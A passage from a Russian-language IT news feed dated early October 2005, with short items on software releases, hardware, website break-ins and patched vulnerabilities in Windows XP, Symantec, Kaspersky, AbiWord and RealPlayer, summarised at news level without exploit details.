По сообщению ЗАО «Элтел», на канале между Москвой и Санкт-Петербургом, который предоставляет компания ЗАО «ЕвроТел», 9 октября 2005 с 23:00 до 23:15 (время московское) будут проводиться работы по переходу с резервной на основную трассу. В связи с этим может быть затруднён доступ к зарубежным и некоторым российским ресурсам. Ранее сообщалось, что именно обрыв данного магистрального кабеля в пятницу, 23 сентября 2005 г., привел к существенному ухудшению связности ряда российских провайдеров с зарубежными сетями и друг с другом. Авария произвела столь серьезный эффект потому, что емкости в пострадавшем кабеле арендовались целым рядом операторов для организации связи с зарубежными сетями; кроме того, этот же кабель использовался для организации маршрутов между российскими сетями, не имеющими между собой прямого пиринга. Вскоре после аварии большинство операторов перешло на резервные каналы, организованные по другим физическим кабелям, не пострадавшим в ходе аварии.
Источник

6/10/2005 13:25 Новая, устойчивая к сбоям, файловая система для Linux
В недрах телефонной компании R&D был разработан и выпущен первый релиз особо устойчивой к сбоям файловой системы NILFS, по производительности не уступающей Solaris UFS, сообщает opennet.ru. Суть NILFS - хранение всех данных в подобных логам структурах, в которых только добавляются новые записи и никогда не переписываются активные. Таким образом оборванная крахом операция записи, никак не отразится на целостности хранимых данных. Другой интересной особенностью NILFS является возможность фиксации снапшотов (snapshot) для просмотра состояния данных на определенный момент времени. В NILFS также используются B-tree деревья и 64-битные структуры данных.
Подробности

6/10/2005 12:58 Антивирус для смартфонов
С дальнейшим увеличением числа смартфонов проблема защиты их от всевозможных вирусов выходит на новый уровень. Похоже, это признают и сами производители. Так, финская Nokia заключила соглашение с известным производителем антивирусного программного обеспечения, корпорацией Symantec. Согласно данному соглашению Nokia сможет поставлять свои смартфоны 60-серии и смартфоны на базе ОС Symbian с предустановленным антивирусным ПО, специально разработанным Symantec для защиты мобильных телефонов от различного рода вирусов и вредоносных программ. Сотрудничество двух компаний по пути создания антивирусного обеспечения для мобильных устройств продолжается уже более двух лет, а заключенное соглашение позволит применить результаты исследований на практике.
Источник

6/10/2005 12:48 В 2006 году в Японии пройдут учения по противодействию кибертерроризму
Министерство внутренних дел и связи Японии приняло решение провести в будущем году первые общенациональные учения по противодействию кибертерроризму. В дальнейшем такие мероприятия планируется проводить каждые три года. Министерство готовится профинансировать и организовать учения, в ходе которых заранее спланированным кибератакам подвергнутся серверы крупных компаний и правительственных организаций по всей стране. Главная цель учений - выявить слабые места в системах защиты компьютерных сетей и принять соответствующие меры по их устранению. В учениях примут участие частные компании, играющих ключевую роль в функционировании экономики. Кроме того, будет проверяться надежность интернет-сайтов центральных и местных органов власти, сообщает РИА "Новости" со ссылкой на японскую прессу.
РИА "Новости"

6/10/2005 11:55 Apache выпустила Beehive 1.0
Организация Apache Software Foundation объявила о выпуске Beehive 1.0, набора компонентов для J2EE и Struts. Beehive облегчает разработку веб-приложений на языке Java, сокращая объем кодирования, необходимого для создания работающего приложения. Первоначально этот проект open source родился из продукта WebLogic Workshop компании BEA Systems. В мае 2004 года она передала код проекту Apache Incubator, и а в июле этого года Beehive стал проектом ASF верхнего уровня. По словам вице-президента Beehive Эдди Онила, разработчики довольных ходом проекта. Beehive состоит из трех основных частей: NetUI, Controls и Web Service Metadata (WSM). NetUI представляет собой структуру MVC (модель-вид-контроллер), надстроенную над Apache Struts, которая добавляет набор JSP-тегов для создания страниц HTML, а также более сложных элементов пользовательского интерфейса, таких как таблицы данных (data grids). Controls это серверные классы J2EE, обеспечивающие согласованный интерфейс для разных источников данных и других ресурсов. То и другое в значительной мере опирается на метаданные и соответствует стандарту Java Metadata JSR 175. Механизм WSM, который распространяет возможность использования метаданных на веб-сервисы, не вошел в Beehive 1.0, так как стандарт JSR 181 официально еще не утвержден — он находится в последней стадии процесса Java Community Process (Technology Compatibility Kit).
Подробнее

6/10/2005 11:34 Уязвимость в Windows XP
Laszlo Toth обнаружил, что в ОС Windows XP существует уязвимость, позволяющая локальному пользователю получить важную системную информацию. Уязвимость присутсвует в т.н. сервисе Wireless Zero Configuration (предназначен для автоматической конфигурации IEEE 802.11-адаптеров для обеспечения беспроводной связи) и позволяет пользователю получить профайлы беспроводных устройств, используя функцию API "WZCQueryInterface()". Полученная информация содержит следующие сведения: SSIDs и WEP ключи или PMK (Pairwise Master Key), которые используются на стадии предварительного обмена ключей при аутентификации WPA (Wi-Fi Protected Access). Уязвимость подтверждена в обоих версиях (Home и Professional) с SP2. M$ обещает исправить уязвимость в новой версии Windows (написано Longhorn, по-видимому, теперь уже - Vista). Довольно примечательна история переписки автора с Microsoft и реакцией последней (уязвимость была обнаружена ещё в марте этого года).
Описание

6/10/2005 10:12 В интернете остались только русские мошенники
Зачистив англоязычный интернет от черных рынков кибермошенников «всех мастей», Секретная служба США (US Secret Service) столкнулась с серьезной проблемой: подавляющее большинство криминальных торговых площадок интернета теперь «говорит» по-русски. Об этом заявил директор по расследованиям Брайан Нейджел (Brian Nagel) на конференции по безопасности кредитных карт. Последняя крупная международная полицейская операция «Огненная стена» (Operation Firewall) была проведена в октябре 2004 года. Тогда были арестованы 28 человек в семи странах, и закрыты несколько подпольных сайтов, где торговали фальшивыми документами, данными о кредитных картах и оборудованием для их изготовления. В общей сложности, ущерб от деятельности арестованных составил порядка $4,3 млн. «Англоязычные криминальные группы в интернете, кажется, полностью искоренены. Русскоязычные… достаточно сильно возродилась и, кажется, в них стало еще больше членов, чем было до этого», утверждает Нейджел. По его словам, лишь немногие агенты Секретной службы знают русский язык. «Это не проблема, но это область, в которой мы должны расти», — сказал он. Кроме языкового барьера, существует ещё и законодательный, над которым тоже предстоит поработать, признал директор.
Источник

6/10/2005 09:43 AJAX: свежий взгляд на программное обеспечение
Новый метод веб-разработки обещает нарушить статус-кво в индустрии программного обеспечения и стереть грань между настольными и веб-приложениями. Долгие годы настольные приложения, привязанные к определенной операционной системе, оставались основным способом работы с компьютером. AJAX, система методов разработки, стандартизованных за последние восемь лет, может изменить ситуацию, обеспечив веб-приложения более удобным пользовательским интерфейсом. Сторонники надеются, что это пробьет брешь в доминировании настольного ПО, такого как Microsoft Office. «Эта область остро нуждается в инновациях, — говорит Скотт Дицен, президент молодой компании Zimbra. — Сегодня нет фирмы, способной бросить вызов Microsoft. Но это положение нужно изменить». Во вторник, на конференции Web 2.0 в Сан-Франциско, Zimbra представила свою бизнес-модель и объявила о том, что она собрала $16 млн венчурного капитала. В ноябре компания планирует выпустить бесплатную open-source версию своего сервера электронной почты. За годовую абонентскую плату заказчики смогут получать обновления и поддержку, а более мощная версия будет платной. Zimbra относится к растущему числу компаний, которые делают ставку на AJAX, то есть Asynchronous JavaScript + XML. Многие веб-предприниматели и авторитетные поставщики ПО надеются, что AJAX сможет придать энергии бизнесу программного обеспечения для ПК, соединив графический интерфейс пользователя с преимуществами веб-технологий.
Подробнее

5/10/2005 13:23 Google-Sun: альянс против Microsoft
Компании Google и Sun Microsystems объявили о стратегическом партнерстве, главным объектом которого является Google Toolbar. Это похоже на символический жест против сами знаете кого. Вчера две компании провели совместную пресс-конференцию, на которой было объявлено о стратегическом партнерстве. За сутки до пресс-конференции в интернете появились слухи о том, что Google собирается представить фирменный комплект офисных приложений Google Office, основанный на открытом проекте Sun OpenOffice. Но ничего подобного не произошло. На самом деле главный результат соглашения касается Google Toolbar. Компания Sun внедрит эту надстройку к браузеру как опцию в дектоп-версии программной среды Java Runtime Environment. Кроме того, компания Google обещает изучить возможности для продвижения и улучшения технологий Sun, таких как Java Runtime Environment и офисный пакет приложений OpenOffice.org, а также обещает покупать больше серверов Sun. Вот, собственно, и все. Эта история воспринимается как один большой «пшик» после той огромной волны слухов, которая предшествовала соглашению. Даже сама компания Google не считает эту новость достойной того, чтобы опубликовать собственный пресс-релиз. Однако же информация попала во все средства массовой информации, что говорит об одном — Google продолжает контролировать пиар-каналы, а каждая новость от этой фирмы воспринимается как некое откровение.
Более подробно

5/10/2005 12:54 Новый мобильный процессор от AMD
Компания AMD представила новый мобильный процессор ML-42 из линейки AMD Turion 64, тем самым еще более расширив столь популярное семейство процессоров AMD для мобильных ПК, поддерживающих одновременное выполнение 32- и 64-разрядных приложений и разработанных специально для мобильных вычислений. По имеющейся информации, частота процессора равна 2,4 ГГц, объем кэш-памяти второго уровня составляет 1 Мб, а максимальное тепловыделение – 35 Вт. Стоимость новинки при закупке партий от 1000 единиц составит $525. Что касается дальнейших планов компании на мобильном рынке, то ожидается, что AMD представит процессор ML-44 в четвертом квартале нынешнего года, а за ним последует выход MT-42, запланированный на начало следующего года. Что касается выхода первых двухъядерных процессоров на ядре Taylor для мобильных ПК, то он также состоится в 2006 году.
Источник

5/10/2005 12:34 Выпущены "заплатки" к Linux-версии RealPlayer
На днях компания RealNetworks выпустила комплект критических обновления для Linux-версий своих программных плееров RealPlayer и Helix Player. Уязвимость, которую устраняет патч, делала возможным удаленное управление компьютером после открытия пользователем модифицированных файлов с расширениями *.rp (realpix) и *.rt (realtext). Согласно информации, полученной от RealNetworks, атаке подвержены RealPlayer 10 (с 10.0.0 по 10.0.5 включительно) и Helix Player (также версии с 10.0.0 по 10.0.5 включительно). На прошлой неделе подробные инструкции по использованию эксплойта были опубликованы в Сети, вследствие чего некоторые компании классифицировали уязвимость как критическую. Патч, обновляющий указанные плееры до версии 10.0.6 доступен в настоящее время для скачивания с сайта RealNetworks.
Подробности

5/10/2005 12:01 Web-сайт Spread Firefox вновь был взломан
Spread Firefox, web-сайт, занимающийся раскруткой открытого web-браузера Mozilla Firefox, вновь был взломан и не будет функционировать ближайшее время. Судя по письму, разосланному в этот вторник зарегистрированным на портале пользователям, проникновение было обнаружено на этой неделе и оно никоим образом не затронуло ни главный web-сайт Mozilla.org, ни архивы с программной продукцией организации. Сообщается, что сервер, на котором расположен сайт Spread Firefox, подвергся нападению через эксплуатирование уязвимости в безопасности TWiki — свободно распространяемого ПО для создания на сайте системы совместного пользования wiki. Это уже второй случай, когда Spread Firefox взламывают через уязвимость в запущенном на сервере программном обеспечении. В первый раз злоумышленники эксплуатировали уязвимость в PHP, на котором написана используемая на SF система управления сайтом (CMS) Drupal. По всей видимости, взлом не привел к раскрытию пользовательских данных, однако всем владельцам аккаунтов рекомендуется сменить свои пароли, когда сайт вновь начнет функционировать, что ожидается к 15 октября.
Nixp.Ru

5/10/2005 11:36 Неизвестные хакеры взломали официальный сайт МВД Беларуси
Неизвестные хакеры взломали официальный сайт МВД Беларуси, сообщили в среду, 5 октября, в этом ведомстве. Сейчас правоохранительные органы страны занимаются поиском злоумышленников. Как заявили в министерстве внутренних дел Беларуси, "это первая хакерская атака такого уровня на сайт МВД за все время его существования". У сотрудников министерства "уже есть несколько наиболее вероятных версий того, кто совершил хакерскую атаку на официальный сайт МВД, но в целях следствия имена подозреваемых не разглашаются", - заявили в МВД. В настоящее время работа сайта МВД восстановлена.
Источник

5/10/2005 10:51 Уязвимость в Symantec AntiVirus
iDEFENSE сообщает о наличии уязвимости в популярном антивирусном ПО AntiVirus Scan Engine Web Service (административный инфтерфейс). Scan Engine представляет собой TCP/IP сервер и антивирусный API для использования сторонними производителями в собственных продуктах. Как сообщается, уязвимость связана с некорректной обработкой заголовков HTTP, что может привести к выполнению произвольного кода в системе. Для этого удалённому атакующему необходимо послать специальным образом сформированный HTTP-запрос к порту, на котором работает административный интерфейс (8004/tcp). При успешно проведённой атаке код выполняется в системе с привилегиями SYSTEM, однако требуется возможность посылать HTTP-запросы на порт 8004. Уязвимости подвержены продукты на основе Symantec AntiVirus Scan Engine 4.0 и 4.3. Версия 4.1 уязвимости не подвержена. Для устранения ошибки рекомендуется воспользоваться выпущенным производителем обновлением.
Описание уязвимости

5/10/2005 10:37 Новый троянец эксплуатирует старую "дыру" в Office
В Сети появилась новая троянская программа, способная захватить управление компьютером через уязвимость в Microsoft Office. Дыра, которую использует вредоносная программа, была обнаружена пять месяцев назад, но её до сих пор не закрыли. Проникновение на компьютер происходит через СУБД Jet Database Engine, которую использует, в частности, Microsoft Access, сообщают в Symantec. Заражению могут подвергнуться те машины, которые работают с файлами формата mdb. Специалисты компании назвали троянца Backdoor.Hesive, и отметили, что он не распространен широко. Хакеры не спешили: первая программа эксплуатирующая уязвимость (эксплоит) была выпущена в интернет в апреле сразу после того, как в компании HexView обнаружили «дыру». Тогда эксперты по информационной безопасности Secunia присвоили уязвимости рейтинг «высоко критическая». В Microsoft отреагировали на появление троянца заявлением по электронной почте. «Microsoft предупреждена о недавнем выпуске троянца и предпримет соответствующие действия», — написал представитель корпорации, пишет Silicon.
CNews

5/10/2005 10:02 PGP выпустит систему шифрования диска
В ноябре компания PGP планирует выпустить новое ПО шифрования для ноутбуков, настольных ПК и серверов. В распространенном в понедельник заявлении PGP Corp. говорится, что новые продукты семейства Whole Disk Encryption обеспечат полное шифрование жесткого диска при выключении компьютера, что поможет защитить данные в случае кражи или потери ПК. Кроме того, пользователи смогут выбрать режим динамического шифрования отдельных файлов во время работы. Пакет позволит также безопасно сохранять данные на внешних устройствах и надежно стирать их с диска. PGP Corp. образовалась в 2002 году, когда Network Associates (теперь McAfee) продала вновь созданной компании свою систему шифрования Pretty Good Privacy. За последние три года заказчики купили свыше полумиллиона пользовательских лицензий на систему шифрования диска PGP. Новый пакет обещает решение организациям, которых новые законы вынуждают оповещать потребителей в случае проникновения в систему или потери носителя с данными. Этот рынок обживают и другие производители ПО, включая IBM.
Подробности

4/10/2005 14:40 Защита сетевых сервисов с помощью stunnel
Очередной хорошей статьёй порадовал сетевую общественность Андрей Бешков ака Tigrisha. На сей раз им была написана статья о защите сетевых сервисов при помощи утилиты stunnel. Статья написана в 3-х частях и описывает защиту (в первую очередь, естественно, от прослушивания трафика) таких сервисов, как imap, pop3, mySQL, SWAT, VNC.
Статья

4/10/2005 13:57 Опасная уязвимость в AbiWord
В свободно распространяемом текстовом процессоре AbiWord найдена уязвимость, позволяющая удаленному пользователю выполнять в системе произвольный код. Проблема существует в коде, ответственном за импорт файлов формата RTF (Rich Text Format). Злоумышленник может создать cпециально сформированный RTF-файл, при открытии которого произойдет переполнение стека, вследствие чего на системе будет запущен произвольный код с привилегиями пользователя, запустившего AbiWord. Об уязвимости стало известно от Криса Эванса (Chris Evans). Ошибка устранена в релизе AbiWord 2.2.10, доступном для свободного скачивания на www.abisource.com
Nixp.Ru

4/10/2005 13:23 Комментарии "Лаборатории Касперского" на сообщение об уязвимости
Получив сообщение о наличии уязвимости в своих антивирусных продуктах, "Лаборатория Касперского" опубликовала комментарий на своём сайте, из которого следует, что "компания подтверждает существование уязвимости в одном из модулей Антивируса Касперского, обеспечивающем обработку архивированных файлов типа CAB. Использование данной уязвимости приводит к сбою в работе антивирусной программы. Этот эффект проявляется исключительно при работе в среде Windows, и не затрагивает другие ОС. В то же время, специалистами «Лаборатории Касперского» был предпринят ряд мер, направленных на устранении угрозы, связанной с уязвимостью CAB-модуля. Прежде всего, после получения соответствующих данных командой антивирусных аналитиков в сжатые сроки был создан пакет сигнатур, обнаруживающих возможные для данной уязвимости эксплойты (процедуры использования уязвимости для проникновения на компьютер). Этот набор сигнатур был добавлен в антивирусные базы Антивируса Касперского 29 сентября, что значительно снижает вероятность успешного использования эксплойтов CAB-уязвимости. Более того, на данный момент не зарегистрировано ни одной попытки создания и распространения подобных эксплойтов. В этой связи необходимо отметить, что сам Алекс Вилер, обнаруживший данную уязвимость, не предоставил использующий ее демонстрационный код. В совокупности перечисленные факторы позволяют утверждать, что фактическая опасность, представляемая CAB-уязвимостью, является минимальной и неспособна повлиять на уровень антивирусной защиты продуктов «Лаборатории Касперского». На данный момент эксперты «Лаборатории Касперского» осуществляют разработку экстренного обновления антивирусных продуктов компании, содержащих подверженный уязвимости CAB-модуль. Уточненный список этих продуктов включает следующие: Антивирус Касперского Personal 5.0, Антивирус Касперского Personal Pro 5.0, Антивирус Касперского 5.0 для Windows Workstations, Антивирус Касперского 5.0 для Windows File Servers, Kaspersky Personal Security Suite 1.1. При этом антивирусные продукты версии 4.5 не подвержены воздействию уязвимости. Обновления для всех указанных программ, устраняющих CAB-уязвимость, будут выпущены во второй половине 5 октября 2005 года, и станут доступными для установки с помощью стандартных процедур загрузки обновлений".
Сайт компании

4/10/2005 12:41 RIAA обвинили в компьютерном взломе, рэкете и мошенничестве
42-летняя жительница Орегона Таня Андерсен, инвалид, мать-одиночка, стала объектом судебного нападения Ассоциации звукозаписывающих компаний США. Её, как и сотни других, обвинили в массированном скачивании и распространении пиратских копий аудиозаписей. Причём не каких-нибудь, а рэпа (gangsta rap). Дело в том, что RIAA наняла компанию MediaSentry для выслеживания любителей файлообмена. В результате "охоты", единственные сведения, которые получает MediaSentry - это, по сути дела, IP-адрес, или какая-то другая сетевая информация о любителе файлообмена. После этого либо подаются "анонимные" иски с целью принудить провайдеров выдать имена пользователей. После этого уже с потенциальной жертвой связываются представители созданного RIAA "Центра поддержки досудебных соглашений", - организации, которая занимается выдавливанием денег из нарушителей. В противном случае, естественно, жертвам угрожают крупным иском. Именно это и произошло с Таней Андерсен. Когда ей прислали извещение из юридической конторы, представляющей интересы RIAA с обвинениями, она обратилась в "Центр поддержки досудебных соглашений", где ей напрямую объяснили, что в её домашнем компьютере порылись агенты MediaSentry. И что они, дескать, имели счастье наблюдать, как в 4:24 утра она входила в сеть KaZaA под логином gotenkito@kazaa.com и выкачивала "гангстерский" рэп. Поэтому ей было предложено либо немедленно раскошелиться, либо получить иск от RIAA на круглую сумму. То, что для 42-летней женщины с большими проблемами со здоровьем, матери 8-летнего ребёнка было бы несколько странно подниматься в 4:24 утра и качать рэп, никого не смутило.
Более подробно

4/10/2005 12:18 Уязвимость в антивирусе Касперского
«Критическая» ошибка в антивирусном ПО «Лаборатории Касперского» позволяет злоумышленнику завладеть системами, в которых оно используется. Как пишет в предупреждении секьюрити-исследователь Алекс Уэллер, проблема кроется в антивирусной библиотеке ЛК. Вероятно, что она влияет на многие продукты ЛК на разных платформах, так как библиотека используется в разных потребительских и корпоративных программных продуктах компании. Более того, могут пострадать и продукты других поставщиков, которые используют технологию антивируса Касперского, утверждает Уэллер. В рекомендации French Security Incident Response Team (FrSirt) говорится, что злоумышленник может использовать ошибку переполнения динамически распределяемой области памяти (heap overflow) дистанционно, направив в уязвимую систему специально сформированный компрессированный файл CAB. Это можно сделать, например, по e-mail, и как только сканер антивируса Касперского обработает этот файл, злонамеренный код окажется в системе. Никаких действий со стороны пользователя при этом не требуется. FrSirt расценивает проблему как «критическую», что соответствует наивысшей степени опасности по ее рейтингу. Представитель ЛК в Москве не смог немедленно прокомментировать проблему и пообещал, что российская компания изучит ее.
Описание в PDF

4/10/2005 11:51 Взломан "игровой" сервер в сетях Novell
Сервер, находящийся в пределах сетей компании Novell и, по всей видимости, использовавшийся для игры в World of Warcraft, оказался взломан и был использован злоумышленниками для поиска уязвимых компьютеров во всём мире. Специалист по сетевой безопасности Крис Брэндон, президент компании Brandon Internet Security, обнаружил взлом после того, как зафиксировал активное сканирование порта (TCP-порт 22), установленного по умолчанию для Secure Shell (SSH). Такое сканирование, как правило, означает, что взломщики ищут уязвимые SSH-системы, в которые можно было бы влезть. Источником сканирования оказался сервер с IP-адресом, принадлежащим сетям Novell. Как выяснилось, на взломанной системе располагался почтовый сервер для игрового сайта Neticus.com (в настоящий момент недоступен), в то время, как главная страница этого сайта находилась на другой машине, также в адресной зоне, принадлежащей Novell. Сканирование продолжалось как минимум с 21 сентября, и велось чрезвычайно активно, так что масштабы "улова" могут быть весьма обширными. Представитель Novell Кевин Барни подтвердил факт взлома, однако заявил, что взломанный сервер не входит в корпоративную сеть Novell, и не имеет отношения к производственным процессам компании. Как уверяют в Novell, это были тестовые системы, располагающиеся вне зоны, защищённой корпоративными брандмауэрами, и к тому же сервер, хостировавший главную страницу Neticus.com, использовался, по словам Барни, лишь для использования игровой информации.
Источник

4/10/2005 11:28 Берегитесь отравленных блогов
Киберпреступники все чаще размещают в блогах вредоносные файлы, готовые подбросить в компьютер троянского коня. В первом полугодии 2005 года злоумышленники начали использовать для размещения своих вредоносных файлов службы бесплатного веб-хостинга и блоги, предупреждает секьюрити-фирма Websense. В ее отчете Security Trends Report 2005 говорится, что в последнее время веб все больше становится «главным направлением атак»: вместо того, чтобы рассылать сами файлы, которые скорее всего будут заблокированы антивирусными и антиспамовыми фильтрами, злоумышленники начали распространять в обманных электронных сообщениях ссылки на эти вредоносные файлы. «Это уже не веб-сайт, на который можно случайно наткнуться и заразить свою машину. Успех атак этого типа опирается на определенный уровень социальной инженерии, воздействующей на человека с целью заинтересовать его ссылкой. Кроме того, блоги используются в качестве первого шага многоуровневых атак, которые могут включать также подложные электронные письма, троянского коня или программу регистрации нажатых клавиш», — говорится в отчете. Растущая популярность сайтов, предлагающих бесплатные блоги и веб-пространство, гарантирует авторам вредоносных программ доступ почти к неограниченному пространству памяти для размещения своего кода. Websense утверждает, что характерный для подобных услуг низкий уровень безопасности приводит к тому, что они регулярно используются для организации атак. «Блог можно использовать и в качестве механизма хранения вредоносного кода, поддерживающего связь с троянским конем, скрытым в компьютере пользователя… для размещения информации в блогах не требуется никакой аутентификации, и большинство служб хостинга блогов не обеспечивает антивирусную защиту своих файлов», — отмечает Websense.
Подробности

4/10/2005 10:43 В Интернете заработала новая доменная зона .travel
В Интернете в тестовом режиме начала работу новая доменная зона .travel, предназначенная для сайтов о туризме и турфирм. Как подчеркивает агентство Associated Press, домены будут выдаваться только организациям, документально обосновавшим свою причастность к этой сфере деятельности. Таким образом, посетитель сайта в этой зоне сможет быть уверенным в том, что поддерживающая его фирма действительно обладает полномочиями на туристическую деятельность. Вместе с тем, официальный регистратор нового домена - нью-йоркская фирма Tralliance, подразделение интернет-холдинга Theglobe.com, заранее оговаривает, что не будет заниматься криминальными расследованиями в случае неадекватного поведения кого-либо из владельцев доменов. Отмечается, что домен не предназначен для чьих-либо личных сайтов о путешествиях. С понедельника в зоне .travel, по сложившейся практике, начинается период регистрации доменов, на которые уже были поданы и рассмотрены предварительные заявки. В первую очередь рассматриваются интересы владельцев зарегистрированных торговых марок во избежание киберсквоттинга. Впоследствии зона будет открыта и для свободной платной регистрации.
Источник

3/10/2005 14:28 Статья о защите данных
На оффсайте журнала "Компьютерра" опубликована статья Сергея Зеленкова под названием "Хорошо ли защищены ваши данные?". Как пишет сам автор в предисловии: "Во многих организациях руководство полагает, что раз денег на защиту данных выделяется немало, то и защищены данные качественно, то есть для их взлома нужно нанимать хакеров редкой квалификации, платить им немалые суммы, идти на контакт с криминалом и вообще быть гораздо умнее конкурентов (потенциальных заказчиков кражи). Кроме того, принято считать, что хакерской атаки можно не опасаться, ибо хакеров мало. Олигарху еще есть какой-то смысл бояться, что их наймут конкуренты, а среднему и малому бизнесу - нет".
Cтатья

3/10/2005 13:20 В отношении луганского хакера возбуждено уголовное дело
В отношении 21-летнего хакера возбуждено уголовное дело по ч.1 ст. 361 УК Украины (Незаконное вмешательство в работу электронно-вычислительных машин (компьютеров), систем, компьютерных сетей и сетей электросвязи). Об этом сообщила пресс-секретарь управления СБУ в Луганской области Юлия Еременко. В свободное от освоения вузовских дисциплин время студент подрабатывал в одной фирме, которая специализировалась на оказании разного рода компьютерных услуг. Особенно много времени в Интернете студент проводил с лета 2004 до лета 2005-го. Именно в этот период дирекцию Укртелекома буквально завалили жалобами пользователи Интернета. Абоненты получали от провайдера огромные счета, абсолютно не соответствовавшие времени, проведенному ими в Интернете. "Совместно с сотрудниками Управления СБУ, в задачи которых входит защита информационного пространства и борьба с компьютерной преступностью, специалисты Укртелекома выявили хакера, пользовавшегося Интернетом за чужой счет", – отметила Юлия Еременко. Хакер использовал для выхода во всемирную сеть чужие логины и пароли, израсходовав в общей сложности 1200 часов Интернет-времени. От его пиратских проделок пострадали более 100 пользователей. "Каким образом он стал обладателем чужих регистрационных данных, являющихся конфиденциальной информацией? Сам он утверждает, что абсолютно случайно. На его электронный адрес якобы пришло послание, содержавшее множество логинов и паролей, принадлежавших другим абонентам, и он не устоял перед соблазном ими воспользоваться. Эта версия не внушает доверия правоохранителям", - подчеркнула пресс-секретарь.
Источник

3/10/2005 13:06 Epson разработала первый с мире гибкий модуль памяти
Компания Seiko Epson сообщила, что она разработала первый в мире гибкий модуль памяти TFT-SRAM. Для изготовления такого модуля используется специальная технология, которая позволяет интегрировать все необходимые электронные цепи на гибкую пластиковую подложку. TFT-SRAM имеет объём 16 Кбит и может работать при напряжении 3 или 6 В. Чип состоит из одной ячейки, включающей шесть транзисторов. Параметры модуля составляют 10,77х8,28 мм, а толщина всего 200 мкм. Время доступа к данным при 3 В для чтения информации - 650 нс, для записи - 325 нс, а при 6 В - 200 и 100 нс соответственно. Модуль может быть применён в другой разработке Epson - 8-битном асинхронном процессоре ACT11. Также компания рассчитывает, что TFT-SRAM будет использоваться для создания миниатюрных и лёгких электронных устройств
Источник

3/10/2005 12:58 Уязвимость в AIX
Как сообщает IBM, в производимой этой компанией ОС AIX обнаружена уязвимость в сетевом анализаторе (снифере) tcpdump. Уязвимость связана с некорректной обработкой tcdump специальным образом сформированных пакетов протокола BGP (Border Gateway Protocol), что может вызвать зацикливание пакета. Уязвимость присутствует в AIX 5.3. Для устранения уязвимости выпущен патч APAR IY77141. Необходимо отметить, что эта уязвимость в tcpdump обнаружена ещё 10 июня этого года Симоном Нильсеном (Simon L. Nielsen) и присутствует в "bgp_update_print()" файла "print-bgp.c".
Сообщени от IBM

3/10/2005 12:24 Web-сайт openSUSE был взломан иранскими хакерами
Вчера усилиями иранских хакеров из группы IHS (Iran Hackers Sabotage) был взломан web-сайт openSUSE. OpenSUSE — проект компании Novell по привлечению программистов-энтузиастов в процесс разработки дистрибутива компании SUSE Linux, стартовавший в августе этого года. Взломащики разместили на главной странице сайта изображение карты с Ираном и сообщение об атомной энергии, которая, по их мнению, принадлежит иранскому народу и пользоваться которой никто не в праве запрещать. Текст призван защитить право Ирана возобновить программу обогащения ураном. «Мы хотим, чтобы иранское правительство как можно скорее вышло из Договора о нераспространении ядерного оружия (NPT) и закрыло британское посольство в Иране, откуда и исходят все проблемы», написали авторы взлома.
Nixp.Ru

3/10/2005 12:02 Microsoft представила IE 7
Microsoft представила предварительную вторую бета-версию браузера Internet Explorer 7 на конференции специалистов по информационной безопасности Hack in the Box в Куала-Лумпуре, Малайзия. Новая версия браузера выйдет в следующем году перед выпуском Windows Vista. Многочисленные уязвимости в IE привели к быстрому распространению конкурирующего продукта — Firefox от Mozilla Foundation. Популярность этого проекта с открытым исходным кодом даже отвлекла внимание хакеров от продукта Microsoft. Однако оказалось, что Firefox, который вначале позиционировался как безопасная альтернатива IE, страдает серьезными уязвимостями не менее. Microsoft, чьи продукты имеют многочисленные «дыры», объявила безопасность своим приоритетным направлением еще три года назад. По словам исполнительного директора Стива Балмера (Steve Ballmer), сказанным в этом году, корпорация разработала новую, более защищенную архитектуру, сообщил Vnunet.
Источник

3/10/2005 11:51 170 Мбит/с по силовой проводке
Matsushita продемонстрировала в Японии сверхскоростной канал доступа в интернет через обычную электрическую розетку. В четверг компания Matsushita Electronics заявила о прорыве в области широкополосного доступа, предложив новую микросхему для выхода в интернет через обычную силовую электросеть. На выставке-ярмарке в Японии компания продемонстрировала сетевой кабель, подключаемый к электрической розетке, который передает данные со скоростью 170 Мбит/с. Компания и раньше демонстрировала передачу данных по силовой проводке, но на скоростях примерно до 10 Мбит/с при строгих ограничениях на длину кабеля. Главная проблема заключается в том, что при длине проводов свыше 150 м сигнал рассеивается. Matsushita, которая продает изделия под торговой маркой Panasonic, заявила Associated Press, что благодаря новой микросхеме, потребители смогут пользоваться широкополосным доступом в интернет, подключаясь к обычной силовой сети. Цель стратегии Matsushita — использовать электрическую сеть в качестве альтернативного интернет-соединения, а также взамен технологии Wi-Fi. Компания отмечает, что электропроводка есть почти в каждом доме, тогда как интернет-соединения, тем более широкополосные, имеются далеко не везде, так что данная система позволит каждому в любой комнате своего дома выходить в интернет, скачивать файлы и смотреть кинофильмы с высокой четкостью изображения. Matsushita планирует также продавать холодильники, телевизоры и другие устройства со встроенным чипом широкополосного доступа.
Источник

3/10/2005 11:28 Статья "Переходим на Linux: грамотный выбор дистрибутива"
Довольно часто возникает ситуация, когда пользователь (либо администратор) решает перейти, в силу ряда как объективных, так и субъектиных причин, на ОС Linux. Кроме того, подобная ситуация может возникнуть и у компаний и фирм (в силу тех же причин). Разумеется, в этом случае необходимо выбрать дистрибутив Linux среди повявившегося в крайнее время разнообразия, поскольку использование неподходящего дистрибутива может привести к непредсказуемым результатам. В статье, опубликованной на сайте CNews, Михаил Рамендик попытался рассказать читателям о наиболее распространённых дистрибутивах, а также об их достоинствах и недостатках. Насколько это удалось автору - судить вам.
Cтатья

3/10/2005 10:56 У Windows XP будет еще одно обновление
По утверждению Microsoft France, Service Pack 3 появится после выхода Vista. Microsoft раскрыла планы выпуска третьего сервисного пакета для Windows ХР. «Будет Service Pack 3 (SP3) для Windows XP», — подтвердил директор Microsoft France по вопросам технологии и безопасности Бернард Урганлян (Bernard Ourghanlian). Это означает, что операционная система Microsoft пройдет еще один эволюционный цикл. Service Pack 2 для Windows ХР, вышедший в сентябре 2004 года, уже произвел глубокие изменения в операционной системе и обновил ее средства защиты. Windows XP SP3 появится в будущем году, после выпуска Windows Vista, который «является приоритетной задачей для разработчиков», утверждает Microsoft France. Microsoft пока не раскрывает никаких подробностей о содержании сервисного пакета. Лоран Делапорте (Laurent Delaporte), заместитель управляющего директора Microsoft France, сказал лишь: «Традиционно определенные функции новых версий Windows интегрируются в сервисные пакеты для предыдущих версий». Так что вероятно, что в Windows XP SP3 окажутся некоторые из менее значительных функций Vista.
Подробности

3/10/2005 10:31 Microsoft будет продавать Windows XP по 1000 рупий
